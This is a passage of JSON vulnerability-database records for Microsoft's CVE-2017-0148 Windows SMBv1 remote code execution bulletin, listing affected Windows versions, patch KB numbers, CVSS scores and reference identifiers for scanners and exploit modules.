"KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T10:51:44", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T10:51:44", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T10:51:44", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012216", "KB4012606", "KB3212646", "KB3177186", "KB4012213", "KB3205401", "KB4012598", "KB4012212", "KB3205409", "KB3210720", "KB4012217", "KB4012214", "KB3213986", "KB4013429", "KB4012215", "KB4013198", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:44", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "3c8f710d7629e55dea40adfa20c8440d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T14:49:48", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 